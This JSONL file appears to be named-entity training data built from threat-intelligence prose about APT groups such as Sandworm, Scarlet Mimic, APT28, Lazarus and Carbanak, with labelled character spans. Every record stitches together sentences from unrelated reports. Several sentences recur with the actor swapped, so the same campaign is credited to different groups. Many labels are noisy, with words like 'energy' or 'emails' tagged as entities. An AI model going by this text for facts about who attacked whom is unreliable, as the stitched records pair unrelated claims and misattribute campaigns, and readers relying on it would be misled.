{"text": "This adversary has been identified leveraging custom-developed plugins for versions 2 and 3 of the commodity malware Black Energy to target entities associated with energy , industrial control systems and SCADA , government , and media for espionage and destructive purposes , since at least 2011 . Keeping in mind the sensitivity of passwords , GoCrack includes an entitlement-based system that prevents users from accessing task data unless they are the original creator or they grant additional users to the task .", "spans": [{"start": 117, "end": 129, "label": "System"}, {"start": 165, "end": 171, "label": "Organization"}, {"start": 213, "end": 223, "label": "Organization"}, {"start": 230, "end": 235, "label": "Organization"}, {"start": 240, "end": 249, "label": "Organization"}, {"start": 346, "end": 353, "label": "Organization"}, {"start": 487, "end": 503, "label": "Organization"}]}
{"text": "A commonly observed element of implants from VOODOO BEAR \u2014 at least until this information was made public in late 2014 \u2014 were references in the malware to the 1965 science fiction novel Dune , by Frank Herbert . The threat actor\u2019s emails usually contain a picture or a link without a malicious payload and are sent out to a huge recipient database of up to 85 , 000 users .", "spans": [{"start": 45, "end": 56, "label": "Organization"}, {"start": 224, "end": 231, "label": "Organization"}, {"start": 232, "end": 238, "label": "System"}, {"start": 285, "end": 302, "label": "Indicator"}, {"start": 367, "end": 372, "label": "Organization"}]}
{"text": "This adversary has been identified leveraging custom-developed plugins for versions 2 and 3 of the commodity malware Black Energy to target entities associated with energy , government , and media for espionage and destructive purposes , since at least 2011 . The admin@338 previous activities against financial and policy organizations have largely focused on spear phishing emails written in English , destined for Western audiences .", "spans": [{"start": 117, "end": 129, "label": "System"}, {"start": 165, "end": 171, "label": "Organization"}, {"start": 174, "end": 184, "label": "Organization"}, {"start": 191, "end": 196, "label": "Organization"}, {"start": 201, "end": 210, "label": "Organization"}, {"start": 264, "end": 273, "label": "Organization"}, {"start": 302, "end": 311, "label": "Organization"}, {"start": 316, "end": 336, "label": "Organization"}, {"start": 376, "end": 382, "label": "System"}, {"start": 425, "end": 434, "label": "Organization"}]}
{"text": "these characteristics all highlight the likelihood that VOODOO BEAR operates in alignment with Russian state interests . This week the experts at FireEye discovered that a group of Chinese-based hackers called admin@338 had sent multiple MH370-themed spear phishing emails , the attackers targeted government officials in Asia-Pacific , it is likely for cyber espionage purpose .", "spans": [{"start": 56, "end": 67, "label": "Organization"}, {"start": 146, "end": 153, "label": "Organization"}, {"start": 210, "end": 219, "label": "Organization"}, {"start": 266, "end": 272, "label": "System"}, {"start": 279, "end": 288, "label": "Organization"}, {"start": 298, "end": 318, "label": "Organization"}, {"start": 354, "end": 369, "label": "Organization"}]}
{"text": "This adversary displays a particular focus on targeting entities in the Ukraine and is believed to be behind the Ukrainian energy sector attacks that caused widespread power outages in late 2015 . The attackers used the popular Poison Ivy RAT and WinHTTPHelper malware to compromise the computers of government officials .", "spans": [{"start": 201, "end": 210, "label": "Organization"}, {"start": 228, "end": 242, "label": "Malware"}, {"start": 247, "end": 260, "label": "Malware"}, {"start": 261, "end": 268, "label": "Malware"}, {"start": 300, "end": 320, "label": "Organization"}]}
{"text": "VOODOO BEAR appears to be integrated into an organization that also operates or tasks multiple pro-Russian hacktivist entities . The admin@338 used the popular Poison Ivy RAT and WinHTTPHelper malware to compromise the computers of government officials .", "spans": [{"start": 0, "end": 11, "label": "Organization"}, {"start": 133, "end": 142, "label": "Organization"}, {"start": 160, "end": 174, "label": "Malware"}, {"start": 179, "end": 192, "label": "Malware"}, {"start": 193, "end": 200, "label": "Malware"}, {"start": 232, "end": 252, "label": "Organization"}]}
{"text": "In the summer of 2014 , BlackEnergy caught our attention when we noticed that samples of it were now tailored to target Ukrainian government institutions . The group previous activities against financial and policy organizations have largely focused on spear phishing emails written in English , destined for Western audiences .", "spans": [{"start": 24, "end": 35, "label": "Organization"}, {"start": 130, "end": 153, "label": "Organization"}, {"start": 194, "end": 203, "label": "Organization"}, {"start": 208, "end": 228, "label": "Organization"}, {"start": 268, "end": 274, "label": "System"}, {"start": 317, "end": 326, "label": "Organization"}]}
{"text": "Related or not , one thing is certain : the actor ( s ) using these customized BlackEnergy malware are intent on stealing information from the targets . The targets were similar to a 2015 TG-4127 campaign \u2014 individuals in Russia and the former Soviet states , current and former military and government personnel in the U.S. and Europe , individuals working in the defense and government supply chain , and authors and journalists \u2014 but also included email accounts linked to the November 2016 United States presidential election .", "spans": [{"start": 44, "end": 49, "label": "Organization"}, {"start": 79, "end": 98, "label": "System"}, {"start": 279, "end": 287, "label": "Organization"}, {"start": 292, "end": 312, "label": "Organization"}, {"start": 365, "end": 372, "label": "Organization"}, {"start": 377, "end": 387, "label": "Organization"}, {"start": 407, "end": 414, "label": "Organization"}, {"start": 419, "end": 430, "label": "Organization"}]}
{"text": "In this paper we focus only on BlackEnergy samples known to be used specifically by the actors we identify as Quedagh , who seem to have a particular interest in political targets . APT28 espionage activity has primarily targeted entities in the U.S. , Europe , and the countries of the former Soviet Union , including governments , militaries , defense attaches , media entities , and dissidents and figures opposed to the current Russian government .", "spans": [{"start": 31, "end": 50, "label": "System"}, {"start": 88, "end": 94, "label": "Organization"}, {"start": 110, "end": 117, "label": "Organization"}, {"start": 162, "end": 179, "label": "Organization"}, {"start": 319, "end": 330, "label": "Organization"}, {"start": 333, "end": 343, "label": "Organization"}, {"start": 346, "end": 362, "label": "Organization"}, {"start": 365, "end": 379, "label": "Organization"}, {"start": 386, "end": 396, "label": "Organization"}, {"start": 401, "end": 408, "label": "Organization"}, {"start": 432, "end": 450, "label": "Organization"}]}
{"text": "Special focus will be on the samples that were used in targeted attacks against Ukrainian government organizations earlier this year . APT28 espionage activity has primarily targeted entities in the U.S. , Europe , and the countries of the former Soviet Union , including governments and militaries , defense attaches , media entities , and dissidents and figures opposed to the current Russian government .", "spans": [{"start": 90, "end": 114, "label": "Organization"}, {"start": 272, "end": 283, "label": "Organization"}, {"start": 288, "end": 298, "label": "Organization"}, {"start": 301, "end": 317, "label": "Organization"}, {"start": 320, "end": 334, "label": "Organization"}, {"start": 341, "end": 351, "label": "Organization"}, {"start": 356, "end": 363, "label": "Organization"}, {"start": 387, "end": 405, "label": "Organization"}]}
{"text": "Although they may have started much earlier , the earliest BlackEnergy sample we could attribute to the Quedagh gang is from December 14 , 2010 . APT28 targets Russian rockers and dissidents Pussy Riot via spear-phishing emails .", "spans": [{"start": 59, "end": 77, "label": "System"}, {"start": 104, "end": 116, "label": "Organization"}, {"start": 146, "end": 151, "label": "Organization"}, {"start": 168, "end": 175, "label": "Organization"}, {"start": 180, "end": 201, "label": "Organization"}, {"start": 221, "end": 227, "label": "System"}]}
{"text": "We warned our clients of new features suggesting an increased focus on European targets - though verification of targets was not possible at the time . We have reasons to believe that the operators of the APT28 network are either Russian citizens or citizens of a neighboring country that speak Russian .", "spans": [{"start": 188, "end": 197, "label": "Organization"}, {"start": 205, "end": 210, "label": "Organization"}, {"start": 238, "end": 246, "label": "Organization"}, {"start": 250, "end": 258, "label": "Organization"}]}
{"text": "Sandworm Team may have opted for a ' hide in plain sight ' approach to evade detections from rootkit scanners , such as GMER and RootkitRevealer , that checks for system anomalies . Russian citizens\u2014journalists , software developers , politicians , researchers at universities , and artists are also targeted by Pawn Storm .", "spans": [{"start": 0, "end": 13, "label": "Organization"}, {"start": 190, "end": 210, "label": "Organization"}, {"start": 213, "end": 232, "label": "Organization"}, {"start": 235, "end": 246, "label": "Organization"}, {"start": 249, "end": 276, "label": "Organization"}, {"start": 283, "end": 290, "label": "Organization"}, {"start": 312, "end": 322, "label": "Organization"}]}
{"text": "Table 3 ( above ) summarizes the commands supported by the variants used in the attack against Ukrainian government organizations . In addition to focused targeting of the private sector with ties to Vietnam , APT32 has also targeted foreign governments , as well as Vietnamese dissidents and journalists since at least 2013 .", "spans": [{"start": 105, "end": 129, "label": "Organization"}, {"start": 210, "end": 215, "label": "Organization"}, {"start": 242, "end": 253, "label": "Organization"}, {"start": 278, "end": 288, "label": "Organization"}, {"start": 293, "end": 304, "label": "Organization"}]}
{"text": "In the summer of 2014 , we noted that certain samples of BlackEnergy malware began targeting Ukranian government organizations for information harvesting . In 2014 , APT32 leveraged a spear-phishing attachment titled \" Plans to crackdown on protesters at the Embassy of Vietnam.exe , \" which targeted dissident activity among the Vietnamese diaspora in Southeast Asia .", "spans": [{"start": 57, "end": 76, "label": "System"}, {"start": 102, "end": 126, "label": "Organization"}, {"start": 166, "end": 171, "label": "Organization"}, {"start": 270, "end": 281, "label": "Indicator"}, {"start": 341, "end": 349, "label": "Organization"}]}
{"text": "These samples were identified as being the work of one group , referred to in this document as \" Quedagh \" , which has a history of targeting political organizations . In 2017 , social engineering content in lures used by the actor provided evidence that they were likely used to target members of the Vietnam diaspora in Australia as well as government employees in the Philippines .", "spans": [{"start": 55, "end": 60, "label": "Organization"}, {"start": 97, "end": 104, "label": "Organization"}, {"start": 142, "end": 165, "label": "Organization"}, {"start": 178, "end": 196, "label": "Organization"}, {"start": 226, "end": 231, "label": "Organization"}, {"start": 310, "end": 318, "label": "Organization"}, {"start": 343, "end": 363, "label": "Organization"}]}
{"text": "The attacks we attribute to Scarlet Mimic have primarily targeted Uyghur and Tibetan activists as well as those who are interested in their causes . APT33 sent spear phishing emails to employees whose jobs related to the aviation industry .", "spans": [{"start": 28, "end": 41, "label": "Organization"}, {"start": 66, "end": 72, "label": "Organization"}, {"start": 77, "end": 94, "label": "Organization"}, {"start": 149, "end": 154, "label": "Organization"}, {"start": 175, "end": 181, "label": "System"}, {"start": 185, "end": 194, "label": "Organization"}, {"start": 221, "end": 238, "label": "Organization"}]}
{"text": "To infect individuals with access to the data the actors desire , Scarlet Mimic deploys both spear-phishing and watering hole ( strategic web compromise ) attacks . APT37 targeted a research fellow , advisory member , and journalist associated with different North Korean human rights issues and strategic organizations .", "spans": [{"start": 50, "end": 56, "label": "Organization"}, {"start": 66, "end": 79, "label": "Organization"}, {"start": 165, "end": 170, "label": "Organization"}, {"start": 182, "end": 197, "label": "Organization"}, {"start": 200, "end": 215, "label": "Organization"}, {"start": 222, "end": 232, "label": "Organization"}, {"start": 296, "end": 319, "label": "Organization"}]}
{"text": "As with many other attackers who use spear-phishing to infect victims , Scarlet Mimic makes heavy use of \" decoy \" files . The majority of APT37 activity continues to target South Korea , North Korean defectors , and organizations and individuals involved in Korean Peninsula reunification efforts .", "spans": [{"start": 19, "end": 28, "label": "Organization"}, {"start": 72, "end": 85, "label": "Organization"}, {"start": 201, "end": 210, "label": "Organization"}]}
{"text": "The most recent Scarlet Mimic attacks we have identified were conducted in 2015 and suggest the group has a significant interest in both Muslim activists and those interested in critiques of the Russian government and Russian President Vladimir Putin . In May 2017 , APT37 used a bank liquidation letter as a spear phishing lure against a board member of a Middle Eastern financial company .", "spans": [{"start": 96, "end": 101, "label": "Organization"}, {"start": 137, "end": 153, "label": "Organization"}, {"start": 267, "end": 272, "label": "Organization"}, {"start": 339, "end": 351, "label": "Organization"}, {"start": 372, "end": 389, "label": "Organization"}]}
{"text": "Using these tactics Scarlet Mimic can directly target previously identified individuals ( spear phishing ) as well as unidentified individuals who are interested in a specific subject ( watering hole ) . Per the complaint , the email account watsonhenny@gmail.com was used to send LinkedIn invitations to employees of a bank later targeted by APT38 .", "spans": [{"start": 20, "end": 33, "label": "Organization"}, {"start": 242, "end": 263, "label": "Indicator"}, {"start": 305, "end": 314, "label": "Organization"}, {"start": 343, "end": 348, "label": "Organization"}]}
{"text": "This group has been conducting attacks for at least four years using a backdoor Trojan that has been under active development . The APT38 uses DYEPACK to manipulate the SWIFT transaction records and hide evidence of the malicious transactions , so bank personnel are none the wiser when they review recent transactions .", "spans": [{"start": 5, "end": 10, "label": "Organization"}, {"start": 71, "end": 86, "label": "System"}, {"start": 132, "end": 137, "label": "Organization"}, {"start": 143, "end": 150, "label": "Malware"}, {"start": 248, "end": 262, "label": "Organization"}]}
{"text": "Based on analysis of the data and malware samples we have collected , Unit 42 believes the attacks described herein are the work of a group or set of cooperating groups who have a single mission , collecting information on minority groups who reside in and around northwestern China . APT39 's focus on the telecommunications and travel industries suggests intent to perform monitoring , tracking , or surveillance operations against specific individuals , collect proprietary or customer data for commercial or operational purposes that serve strategic requirements related to national priorities , or create additional accesses and vectors to facilitate future campaigns .", "spans": [{"start": 70, "end": 77, "label": "Organization"}, {"start": 134, "end": 139, "label": "Organization"}, {"start": 162, "end": 168, "label": "Organization"}, {"start": 223, "end": 238, "label": "Organization"}, {"start": 285, "end": 290, "label": "Organization"}, {"start": 307, "end": 347, "label": "Organization"}, {"start": 434, "end": 454, "label": "Organization"}]}
{"text": "Attacks launched by this group were publicly exposed on 2013 in a Trend Micro report about the FakeM Trojan . Other groups attributed to Iranian attackers , such as Rocket Kitten , have targeted Iranian individuals in the past , including anonymous proxy users , researchers , journalists , and dissidents .", "spans": [{"start": 25, "end": 30, "label": "Organization"}, {"start": 66, "end": 77, "label": "Organization"}, {"start": 95, "end": 107, "label": "System"}, {"start": 116, "end": 122, "label": "Organization"}, {"start": 145, "end": 154, "label": "Organization"}, {"start": 165, "end": 178, "label": "Organization"}, {"start": 239, "end": 260, "label": "Organization"}, {"start": 263, "end": 274, "label": "Organization"}, {"start": 277, "end": 288, "label": "Organization"}, {"start": 295, "end": 305, "label": "Organization"}]}
{"text": "We will also provide detailed analysis of the latest variants of the malware they deploy ( known as FakeM ) as well as other associated tools that allow Scarlet Mimic to target Android and OS X devices . We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers .", "spans": [{"start": 100, "end": 105, "label": "System"}, {"start": 153, "end": 166, "label": "Organization"}, {"start": 224, "end": 232, "label": "Malware"}, {"start": 299, "end": 308, "label": "Organization"}, {"start": 349, "end": 367, "label": "Organization"}, {"start": 391, "end": 400, "label": "Organization"}]}
{"text": "In the past , Scarlet Mimic has primarily targeted individuals who belong to these minority groups as well as their supporters , but we've recently found evidence to indicate the group also targets individuals working inside government anti-terrorist organizations . Carbanak has its origin in more common financial fraud including theft from consumer and corporate bank accounts in Europe and Russia , using standard banking malware , mainly Carberp .", "spans": [{"start": 14, "end": 27, "label": "Organization"}, {"start": 83, "end": 98, "label": "Organization"}, {"start": 116, "end": 126, "label": "Organization"}, {"start": 179, "end": 184, "label": "Organization"}, {"start": 236, "end": 264, "label": "Organization"}, {"start": 267, "end": 275, "label": "Malware"}, {"start": 343, "end": 351, "label": "Organization"}, {"start": 443, "end": 450, "label": "Malware"}]}
{"text": "We also know Scarlet Mimic uses a number of toolkits to create documents that contain exploit code to install the FakeM payload on a compromised system . The group has its origin in more common financial fraud including theft from consumer and corporate bank accounts in Europe and Russia , using standard banking malware , mainly Carberp .", "spans": [{"start": 13, "end": 26, "label": "Organization"}, {"start": 114, "end": 119, "label": "System"}, {"start": 231, "end": 239, "label": "Organization"}, {"start": 331, "end": 338, "label": "Malware"}]}
{"text": "Unit 42 tracks the toolkits delivering FakeM under the names MNKit , WingD and Tran Duy Linh . Gallmaker 's targets are embassies of an Eastern European country .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 39, "end": 44, "label": "System"}, {"start": 61, "end": 66, "label": "System"}, {"start": 69, "end": 74, "label": "System"}, {"start": 79, "end": 92, "label": "System"}, {"start": 95, "end": 104, "label": "Organization"}, {"start": 120, "end": 129, "label": "Organization"}]}
{"text": "In July of 2015 , we identified a full e-mail uploaded to an antivirus scanning service that carried a Scarlet Mimic exploit document . However , in September last year , our friends at CSIS published a blog detailing a new Carbanak variant affecting one of its customers .", "spans": [{"start": 103, "end": 124, "label": "Vulnerability"}, {"start": 186, "end": 190, "label": "Organization"}, {"start": 224, "end": 232, "label": "Malware"}, {"start": 262, "end": 271, "label": "Organization"}]}
{"text": "We are aware of one case where Scarlet Mimic broke from the spear-phishing pattern described above . 360 and Tuisec already identified some Gorgon Group members .", "spans": [{"start": 31, "end": 44, "label": "Organization"}, {"start": 101, "end": 104, "label": "Organization"}, {"start": 109, "end": 115, "label": "Organization"}, {"start": 140, "end": 152, "label": "Organization"}, {"start": 153, "end": 160, "label": "Organization"}]}
{"text": "In 2013 , the group deployed a watering hole attack , also known as a strategic web compromise to infect victims with their backdoor . Symantec also confirmed seeing the Lazarus wiper tool in Poland at one of their customers .", "spans": [{"start": 14, "end": 19, "label": "Organization"}, {"start": 135, "end": 143, "label": "Organization"}, {"start": 170, "end": 177, "label": "Organization"}, {"start": 215, "end": 224, "label": "Organization"}]}
{"text": "FakeM 's functional code is shellcode-based and requires another Trojan to load it into memory and execute it . This new campaign , dubbed HaoBao , resumes Lazarus ' previous phishing emails , posed as employee recruitment , but now targets Bitcoin users and global financial organizations .", "spans": [{"start": 0, "end": 5, "label": "System"}, {"start": 156, "end": 163, "label": "Organization"}, {"start": 184, "end": 190, "label": "System"}, {"start": 241, "end": 254, "label": "Organization"}, {"start": 266, "end": 289, "label": "Organization"}]}
{"text": "First discussed in January 2013 in a Trend Micro whitepaper , FakeM is a Trojan that uses separate modules to perform its functionality . Beginning in 2017 , the Lazarus group heavily targeted individuals with spear phishing emails impersonating job recruiters which contained malicious documents .", "spans": [{"start": 37, "end": 48, "label": "Organization"}, {"start": 62, "end": 67, "label": "System"}, {"start": 73, "end": 79, "label": "System"}, {"start": 162, "end": 175, "label": "Organization"}, {"start": 225, "end": 231, "label": "System"}, {"start": 246, "end": 260, "label": "Organization"}]}
{"text": "We end this section with a discussion on tools related to FakeM and used by Scarlet Mimic . We concluded that Lazarus Group was responsible for WannaCry , a destructive attack in May that targeted Microsoft customers .", "spans": [{"start": 58, "end": 63, "label": "System"}, {"start": 76, "end": 89, "label": "Organization"}, {"start": 110, "end": 123, "label": "Organization"}, {"start": 144, "end": 152, "label": "Malware"}, {"start": 197, "end": 216, "label": "Organization"}]}
{"text": "Microsoft patched this vulnerability in September 2012 , suggesting that this watering hole attack used an older vulnerability , which aligns with the threat groups continued use of older vulnerabilities in their spear-phishing efforts . The targeting of this individual suggests the actors are interested in breaching the French Ministry of Foreign Affairs itself or gaining insights into relations between France and Taiwan .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 151, "end": 164, "label": "Organization"}, {"start": 260, "end": 270, "label": "Organization"}, {"start": 284, "end": 290, "label": "Organization"}]}
{"text": "Microsoft patched this vulnerability in September 2012 , suggesting that this watering hole attack used an older vulnerability , which aligns with Scarlet Mimic continued use of older vulnerabilities in their spear-phishing efforts . On November 10 , 2015 , threat actors sent a spear-phishing email to an individual at the French Ministry of Foreign Affairs .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 147, "end": 160, "label": "Organization"}, {"start": 265, "end": 271, "label": "Organization"}, {"start": 306, "end": 316, "label": "Organization"}]}
{"text": "Based on the timeline , it appears that the actors were actively developing several of the loaders at the same time from 2009 until the early months of 2014 . On November 10 , 2015 , Lotus Blossom sent a spear-phishing email to an individual at the French Ministry of Foreign Affairs .", "spans": [{"start": 44, "end": 50, "label": "Organization"}, {"start": 183, "end": 196, "label": "Organization"}, {"start": 231, "end": 241, "label": "Organization"}]}
{"text": "Unit 42 tracks this mobile Trojan as MobileOrder , as the authors specifically refer to commands within the app as orders . APT threat actors , most likely nation state-sponsored , targeted a diplomat in the French Ministry of Foreign Affairs with a seemingly legitimate invitation to a technology conference in Taiwan .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 20, "end": 33, "label": "System"}, {"start": 37, "end": 48, "label": "System"}, {"start": 124, "end": 141, "label": "Organization"}, {"start": 192, "end": 200, "label": "Organization"}]}
{"text": "There are also infrastructure ties between some FakeM variants and older activity using Trojans such as Elirks , Poison Ivy , and BiFrost , which were used in attacks as old as 2009 . Additionally , the targeting of a French diplomat based in Taipei , Taiwan aligns with previous targeting by these actors , as does the separate infrastructure .", "spans": [{"start": 48, "end": 53, "label": "System"}, {"start": 104, "end": 110, "label": "System"}, {"start": 113, "end": 123, "label": "System"}, {"start": 218, "end": 233, "label": "Organization"}, {"start": 299, "end": 305, "label": "Organization"}]}
{"text": "There is some infrastructure overlap in the C2 servers used by almost all of the FakeM variants , as well other Trojans such as MobileOrder , Psylo , and CallMe . Since at least 2014 , APT32 , also known as the OceanLotus Group , has targeted foreign corporations with investments in Vietnam , foreign governments , journalists , and Vietnamese dissidents .", "spans": [{"start": 81, "end": 86, "label": "System"}, {"start": 128, "end": 139, "label": "System"}, {"start": 142, "end": 147, "label": "System"}, {"start": 154, "end": 160, "label": "System"}, {"start": 185, "end": 190, "label": "Organization"}, {"start": 211, "end": 227, "label": "Organization"}, {"start": 243, "end": 263, "label": "Organization"}, {"start": 294, "end": 313, "label": "Organization"}, {"start": 316, "end": 327, "label": "Organization"}, {"start": 345, "end": 355, "label": "Organization"}]}
{"text": "Trend Micro published their analysis of the FakeM Trojan on January 17 , 2013 that discussed the original variant of FakeM . APT35 typically targets U.S. and the Middle Eastern military , diplomatic and government personnel , organizations in the media , energy and defense industrial base ( DIB ) , and engineering , business services and telecommunications sectors .", "spans": [{"start": 0, "end": 11, "label": "Organization"}, {"start": 44, "end": 56, "label": "System"}, {"start": 117, "end": 122, "label": "System"}, {"start": 125, "end": 130, "label": "Organization"}, {"start": 177, "end": 185, "label": "Organization"}, {"start": 188, "end": 198, "label": "Organization"}, {"start": 203, "end": 223, "label": "Organization"}, {"start": 226, "end": 239, "label": "Organization"}, {"start": 247, "end": 252, "label": "Organization"}, {"start": 255, "end": 261, "label": "Organization"}, {"start": 266, "end": 289, "label": "Organization"}, {"start": 292, "end": 295, "label": "Organization"}, {"start": 304, "end": 315, "label": "Organization"}, {"start": 318, "end": 335, "label": "Organization"}, {"start": 340, "end": 366, "label": "Organization"}]}
{"text": "The primary source of data used in this analysis is Palo Alto Networks WildFire , which analyzes malware used in attacks across the world . COBALT GYPSY has used spearphishing to target telecommunications , government , defense , oil , and financial services organizations based in or affiliated with the MENA region , identifying individual victims through social media sites .", "spans": [{"start": 52, "end": 79, "label": "Organization"}, {"start": 140, "end": 152, "label": "Organization"}, {"start": 186, "end": 204, "label": "Organization"}, {"start": 207, "end": 217, "label": "Organization"}, {"start": 220, "end": 227, "label": "Organization"}, {"start": 230, "end": 233, "label": "Organization"}, {"start": 240, "end": 272, "label": "Organization"}, {"start": 331, "end": 349, "label": "Organization"}, {"start": 358, "end": 370, "label": "Organization"}]}
{"text": "Scarlet Mimic also uses the infamous HTRAN tool on at least some of their C2 servers . The Magic Hound has repeatedly used social media to identify and interact with employees at targeted organizations and then used weaponized Excel documents .", "spans": [{"start": 0, "end": 13, "label": "Organization"}, {"start": 37, "end": 47, "label": "System"}, {"start": 123, "end": 135, "label": "Organization"}, {"start": 166, "end": 175, "label": "Organization"}]}
{"text": "Scarlet Mimic primarily deploys spear-phishing e-mails to infect its targets , but was also responsible for a watering hole attack in 2013 . The May 2014 ' Operation Saffron Rose ' publication identifies an Iranian hacking group formerly named ' Ajax Security ' ( code-named ' Flying Kitten ' by CrowdStrike ) engaged in active spear phishing attacks on Iranian dissidents ( those attempting to circumvent government traffic monitoring ) .", "spans": [{"start": 0, "end": 13, "label": "Organization"}, {"start": 246, "end": 259, "label": "Organization"}, {"start": 277, "end": 290, "label": "Organization"}, {"start": 296, "end": 307, "label": "Organization"}, {"start": 362, "end": 372, "label": "Organization"}]}
{"text": "Kaspersky Lab has produced excellent research on Scarlet Mimic group . An Iranian hacking group formerly named Ajax Security ( code-named ' Flying Kitten ' by CrowdStrike ) engaged in active spear phishing attacks on Iranian dissidents ( those attempting to circumvent government traffic monitoring ) .", "spans": [{"start": 0, "end": 13, "label": "Organization"}, {"start": 49, "end": 68, "label": "Organization"}, {"start": 111, "end": 124, "label": "Organization"}, {"start": 140, "end": 153, "label": "Organization"}, {"start": 159, "end": 170, "label": "Organization"}, {"start": 225, "end": 235, "label": "Organization"}]}
{"text": "Actors will run HTRAN on a server and configure their malware to interact with that server ; however , the actor will configure HTRAN to forward traffic to another server where the actual C2 server exists . PIVY also played a key role in the 2011 campaign known as Nitro that targeted chemical makers , government agencies , defense contractors , and human rights groups.10,11 Still active a year later , the Nitro attackers used a zero-day vulnerability in Java to deploy PIVY in 2012 .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 16, "end": 21, "label": "System"}, {"start": 107, "end": 112, "label": "Organization"}, {"start": 128, "end": 133, "label": "System"}, {"start": 207, "end": 211, "label": "Malware"}, {"start": 285, "end": 300, "label": "Organization"}, {"start": 303, "end": 322, "label": "Organization"}, {"start": 325, "end": 344, "label": "Organization"}, {"start": 415, "end": 424, "label": "Organization"}, {"start": 432, "end": 440, "label": "Vulnerability"}, {"start": 473, "end": 477, "label": "Malware"}]}
{"text": "The information discovered by Unit 42 and shared here indicates Scarlet Mimic is likely a well-funded and skillfully resourced cyber adversary . APT10 is known to have exfiltrated a high volume of data from multiple victims , exploiting compromised MSP networks , and those of their customers , to stealthily move this data around the world .", "spans": [{"start": 30, "end": 37, "label": "Organization"}, {"start": 64, "end": 77, "label": "Organization"}, {"start": 145, "end": 150, "label": "Organization"}, {"start": 249, "end": 261, "label": "Malware"}, {"start": 283, "end": 292, "label": "Organization"}]}
{"text": "Scarlet Mimic has carried out attacks using both spear-phishing and watering holes since at least 2009 with increasingly advanced malware , and has deployed malware to attack multiple operating systems and platforms . Targeted sectors of Molerats include governmental and diplomatic institutions , including embassies ; companies from the aerospace and defence Industries ; financial institutions ; journalists ; software developers .", "spans": [{"start": 0, "end": 13, "label": "Organization"}, {"start": 238, "end": 246, "label": "Organization"}, {"start": 255, "end": 267, "label": "Organization"}, {"start": 308, "end": 317, "label": "Organization"}, {"start": 339, "end": 348, "label": "Organization"}, {"start": 353, "end": 371, "label": "Organization"}, {"start": 374, "end": 396, "label": "Organization"}, {"start": 399, "end": 410, "label": "Organization"}, {"start": 413, "end": 432, "label": "Organization"}]}
{"text": "This time I'm going to focus on malicious CHM files used by Silence APT . It was during operator X 's network monitoring that the attackers placed Naikon proxies within the countries ' borders , to cloak and support real-time outbound connections and data Exfiltration from high-profile victim organizations .", "spans": [{"start": 42, "end": 51, "label": "System"}, {"start": 60, "end": 71, "label": "Organization"}, {"start": 130, "end": 139, "label": "Organization"}, {"start": 147, "end": 161, "label": "Malware"}]}
{"text": "If you haven't heard about it for some reason , I would recommend to read this detailed report by Group-IB , as this APT attacks not only Russian banks , but also banks in more than 25 countries . In early May 2016 , both PROMETHIUM and NEODYMIUM started conducting attack campaigns against specific individuals in Europe .", "spans": [{"start": 98, "end": 106, "label": "Organization"}, {"start": 146, "end": 151, "label": "Organization"}, {"start": 163, "end": 168, "label": "Organization"}, {"start": 222, "end": 232, "label": "Organization"}, {"start": 237, "end": 246, "label": "Organization"}, {"start": 291, "end": 311, "label": "Organization"}]}
{"text": "The group primarily deploys spear-phishing e-mails to infect its targets , but was also responsible for a watering hole attack in 2013 . Although most malware today either seeks monetary gain or conducts espionage for economic advantage , both of these activity groups appear to seek information about specific individuals .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 218, "end": 226, "label": "Organization"}, {"start": 253, "end": 268, "label": "Organization"}, {"start": 302, "end": 322, "label": "Organization"}]}
{"text": "The group uses legitimate administration tools to fly under the radar in their post-exploitation phase , which makes detection of malicious activity , as well as attribution more complicated . Attackers using several locations in China have leveraged C&C servers on purchased hosted services in the United States and compromised servers in the Netherlands to wage attacks against global oil , gas , and petrochemical companies , as well as individuals and executives in Kazakhstan , Taiwan , Greece , and the United States to acquire proprietary and highly confidential information .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 15, "end": 46, "label": "System"}, {"start": 193, "end": 202, "label": "Organization"}, {"start": 251, "end": 254, "label": "System"}, {"start": 387, "end": 390, "label": "Organization"}, {"start": 393, "end": 396, "label": "Organization"}, {"start": 403, "end": 426, "label": "Organization"}, {"start": 456, "end": 466, "label": "Organization"}]}
{"text": "On January 12 , 2016 , Cylance published a blog linking an exploit document to the group Mandiant refers to as APT2 and CrowdStrike as \" Putter Panda \" . Attackers using several locations in China have leveraged C&C servers on purchased hosted services in the United States and compromised servers in the Netherlands to wage attacks against global oil , gas , and petrochemical companies , as well as individuals and executives in Kazakhstan , Taiwan , Greece , and the United States to acquire proprietary and highly confidential information .", "spans": [{"start": 23, "end": 30, "label": "Organization"}, {"start": 89, "end": 97, "label": "Organization"}, {"start": 111, "end": 115, "label": "Organization"}, {"start": 120, "end": 131, "label": "Organization"}, {"start": 137, "end": 149, "label": "Organization"}, {"start": 154, "end": 163, "label": "Organization"}, {"start": 212, "end": 215, "label": "System"}, {"start": 348, "end": 351, "label": "Organization"}, {"start": 354, "end": 357, "label": "Organization"}, {"start": 364, "end": 387, "label": "Organization"}, {"start": 417, "end": 427, "label": "Organization"}]}
{"text": "In 2016 , Unit 42 launched an unprecedented analytic effort focused on developing a modern assessment of the size , scope and complexity of this threat . Additionally , HELIX KITTEN actors have shown an affinity for creating thoroughly researched and structured spear-phishing messages relevant to the interests of targeted personnel .", "spans": [{"start": 10, "end": 17, "label": "Organization"}, {"start": 169, "end": 188, "label": "Organization"}, {"start": 324, "end": 333, "label": "Organization"}]}
{"text": "In 2014 , Unit 42 released a report titled \" 419 Evolution \" that documented one of the first known cases of Nigerian cybercriminals using malware for financial gain . The attackers sent multiple emails containing macro-enabled XLS files to employees working in the banking sector in the Middle East .", "spans": [{"start": 10, "end": 17, "label": "Organization"}, {"start": 118, "end": 132, "label": "Organization"}, {"start": 172, "end": 181, "label": "Organization"}, {"start": 196, "end": 202, "label": "System"}, {"start": 228, "end": 237, "label": "Indicator"}, {"start": 241, "end": 280, "label": "Organization"}]}
